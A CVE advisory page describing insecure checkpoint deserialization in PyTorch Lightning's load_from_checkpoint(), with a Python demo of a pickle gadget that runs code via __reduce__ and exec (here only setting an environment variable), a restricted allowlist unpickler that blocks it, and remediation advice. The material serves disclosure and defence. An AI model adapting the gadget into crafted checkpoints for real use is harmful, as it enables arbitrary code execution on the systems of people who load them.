CVE-2026-31221 — Insecure checkpoint deserialization in PyTorch Lightning load_from_checkpoint

MITRE service request: 1987825

Status: RESERVED (pending a qualifying public reference per CNA Rules §5.3).

Official CVE description

PyTorch-Lightning versions 2.6.0 and earlier contain an insecure deserialization vulnerability (CWE-502) in the checkpoint loading mechanism. The LightningModule.load_from_checkpoint() method, which is commonly used to load saved model states, internally calls torch.load() without setting the security-restrictive weights_only=True parameter. This default behavior allows the deserialization of arbitrary Python objects via the Pickle module. A remote attacker can exploit this by providing a maliciously crafted checkpoint file, leading to arbitrary code execution on the victim’s system when the file is loaded.

Summary

Any workflow that calls LightningModule.load_from_checkpoint() on an untrusted .ckpt inherits torch.load()'s unrestricted unpickling, because Lightning does not pass weights_only=True. A crafted checkpoint can carry arbitrary pickle gadgets, and they execute while the file is being unpickled, before any weights are restored and regardless of whether the tensors in it match the model.
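To make the mechanism concrete, here is an added example (not code from PyTorch Lightning, PyTorch or this CVE record) that uses the standard-library pickle module as a stand-in for torch.load(). The Gadget class, the MARKER variable, the checkpoint dicts and the AllowlistUnpickler are all constructed for the demo: the gadget sets an environment variable instead of running a shell command, the checkpoint dicts only mimic the top-level keys of a Lightning .ckpt, and the allowlist is a deliberately tiny illustration of the much longer one the real weights_only unpickler in torch uses.

```python
import io
import os
import pickle
from typing import Any

# Marker the constructed gadget sets so the effect is observable without
# side effects; a real payload would call os.system or similar instead.
MARKER = "DEMO_PAYLOAD_RAN"


class Gadget:
    """Stand-in for a pickle gadget embedded in a crafted .ckpt.

    pickle.dumps() records the tuple returned by __reduce__, and an
    unrestricted unpickler calls exec() with the attacker's string while
    rebuilding the object, i.e. during deserialization itself.
    """

    def __reduce__(self):
        return (exec, (f"import os; os.environ['{MARKER}'] = '1'",))


def build_malicious_checkpoint() -> bytes:
    # Constructed checkpoint shaped like a Lightning .ckpt (same top-level
    # keys) with a gadget where a tensor would normally sit.
    ckpt = {
        "pytorch-lightning_version": "2.6.0",
        "epoch": 3,
        "global_step": 1200,
        "state_dict": {"layer.weight": Gadget()},
        "hyper_parameters": {"lr": 1e-3},
    }
    return pickle.dumps(ckpt)


def build_benign_checkpoint() -> bytes:
    # Same layout, plain data only (a list stands in for a tensor).
    ckpt = {
        "pytorch-lightning_version": "2.6.0",
        "epoch": 3,
        "global_step": 1200,
        "state_dict": {"layer.weight": [0.1, -0.2, 0.3]},
        "hyper_parameters": {"lr": 1e-3},
    }
    return pickle.dumps(ckpt)


def load_unrestricted(blob: bytes) -> Any:
    # Equivalent of torch.load(f) without weights_only=True: every global
    # named in the stream is imported and called.
    return pickle.loads(blob)


# (module, name) pairs the restricted loader may resolve. Illustrative only;
# torch's weights_only allowlist covers tensor-rebuild helpers and storages.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    """Restricted unpickler in the style of torch.load(weights_only=True)."""

    def find_class(self, module: str, name: str) -> Any:
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        # Raising here happens before the REDUCE opcode, so the gadget's
        # callable is never invoked.
        raise pickle.UnpicklingError(
            f"refusing to resolve {module}.{name}: not in allowlist"
        )


def load_restricted(blob: bytes) -> Any:
    return AllowlistUnpickler(io.BytesIO(blob)).load()


def restricted_load_refuses(blob: bytes) -> bool:
    try:
        load_restricted(blob)
    except pickle.UnpicklingError:
        return True
    return False


def payload_ran() -> bool:
    return os.environ.get(MARKER) == "1"


if __name__ == "__main__":
    bad = build_malicious_checkpoint()
    print("restricted loader refuses crafted file:", restricted_load_refuses(bad))
    print("marker set after restricted attempt:", payload_ran())
    load_unrestricted(bad)
    print("marker set after unrestricted load:", payload_ran())
```

The benign checkpoint loads under both loaders because plain dicts, lists, strings and numbers need no global lookups; the crafted one is rejected by the restricted loader at the builtins.exec lookup and only the unrestricted loader leaves the marker behind. That is the difference weights_only=True makes on the real torch.load() path.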

Affected product and versions

PyTorch Lightning 2.6.0 and earlier, as stated in the description above. No fixed release is recorded on this page.

Technical details

LightningModule.load_from_checkpoint() reads the .ckpt through torch.load() without weights_only=True, so the file is handed to Python's full Unpickler. A .ckpt is a pickle stream: any global it names is imported and called while its objects are rebuilt, so a crafted file reaches code execution during deserialization itself, before load_state_dict() runs and independent of whether the stored tensors fit the model. With weights_only=True, torch.load() instead uses a restricted unpickler that resolves only an allowlist of tensor and container types and raises on anything else; the description records that Lightning does not set it on this path.

Risk

High — common API path in ML training and inference pipelines.

Remediation / workaround

No fix from the project is recorded on this page. Until one is available, treat a .ckpt as executable code: call load_from_checkpoint() only on files from a source you trust, and verify their integrity (a pinned hash or a signature) before the call. For a checkpoint you cannot fully trust, do not use load_from_checkpoint() at all; instantiate the model yourself, read the file with torch.load(path, weights_only=True), and pass its "state_dict" entry to the model's load_state_dict(). The restricted unpickler refuses any global outside its allowlist, so a checkpoint whose hyper_parameters hold custom objects may fail to load this way; that refusal is the safe outcome, not something to work around by dropping the flag.